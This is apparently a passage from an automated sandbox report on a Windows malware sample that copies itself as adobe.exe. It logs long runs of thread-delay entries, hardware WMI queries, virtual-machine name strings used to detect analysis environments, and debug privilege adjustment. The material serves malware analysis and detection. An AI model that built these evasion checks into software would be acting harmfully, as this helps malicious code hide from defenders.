                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598449s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598338s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598201s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597766s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597218s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596887s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596670s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -596015s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595864s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595682s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595449s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595304s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -595200s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -594822s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -594693s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -594576s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -594432s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -594328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1740Thread sleep count: 5762 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 1740Thread sleep count: 4066 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599123s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -599016s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598624s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598428s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598297s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598117s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -598009s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597886s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597639s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597502s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597266s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597156s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596938s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596719s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596391s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -596063s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595938s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595813s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595688s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595469s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -595061s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -594844s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -594511s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -594121s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593998s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 2044Thread sleep time: -593344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596201Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595971Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594453Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594344Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593360Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599642Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599494Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599372Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599221Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599047Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598905Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598689Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598559Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598449Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598338Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596887Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596670Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595864Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595682Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595449Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595304Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595200Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594822Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594693Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594576Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594432Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599123Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599016Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598428Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598297Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598117Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598009Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597886Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597639Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597502Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596391Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596063Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595938Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595061Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594511Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594121Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593344Jump to behavior
                Source: adobe.exe, 0000000A.00000002.1982245399.000000000303E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: adobe.exe, 0000000A.00000002.1982245399.000000000303E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: adobe.exe, 0000000D.00000002.1982515283.0000000000F94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: x4l3iVpFSc.exe, 00000008.00000002.2461996059.0000000006840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: adobe.exe, 0000000E.00000002.2437040806.000000000125F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess token adjusted: DebugJump to behavior
